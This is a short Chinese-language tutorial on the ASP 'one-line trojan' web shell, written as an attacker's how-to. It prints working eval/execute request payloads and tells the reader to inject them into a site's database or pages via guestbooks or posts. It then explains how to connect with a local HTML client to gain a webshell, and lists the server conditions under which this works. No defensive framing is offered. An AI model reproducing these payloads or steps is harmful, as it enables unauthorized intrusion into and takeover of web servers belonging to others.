一句话木马原理（方法和适用环境）

一.一句话木马原理
黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码：
<%execute request(“value”)%>
其中value是值，所以你可以更改自己的值，前面的request就是获取这个值
<%eval request(“value”)%>(现在比较多见的，而且字符少，对表单字数有限制的地方特别的实用)
当知道了数据库的URL，就可以利用本地一张网页进行连接得到Webshell。（不知道数据库也可以，只要知道<%eval request(“value”)%>这个文件被插入到哪一个ASP文件里面就可以了。）
这就被称为一句话木马，它是基于B/S结构的。
二.使用方法
首先,找到数据库是asp格式的网站,然后,以留言板,或者发表文章的方式,把一句话添加到asp数据库，或者加进asp网页.
记住!我们的目的是把一句话<%execute request(“value”)%>添加到数据库,无论任何方式!然后打开客户端(就是你电脑上面的那个htm文件),填上加入了一句话的asp文件,或者是asp网页,然后进入此网站服务器。
三.一句话木马的适用环境：
1.服务器的来宾账户有写入权限
2.已知数据库地址且数据库格式为asa或asp
3.在数据库格式不为asp或asa的情况下，如果能将一句话插入到asp文件中.